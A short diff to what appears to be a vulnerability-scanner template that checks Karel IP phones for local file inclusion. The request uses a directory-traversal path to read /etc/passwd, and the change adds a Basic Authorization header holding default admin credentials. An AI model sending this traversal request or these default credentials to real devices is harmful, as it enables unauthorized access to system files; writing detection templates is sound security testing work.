--- a/karel-ip-phone-lfi.yaml
+++ b/karel-ip-phone-lfi.yaml
@@ -13,7 +13,8 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
-
+    headers:
+      Authorization: Basic YWRtaW46YWRtaW4=
     matchers-condition: and
     matchers:
 
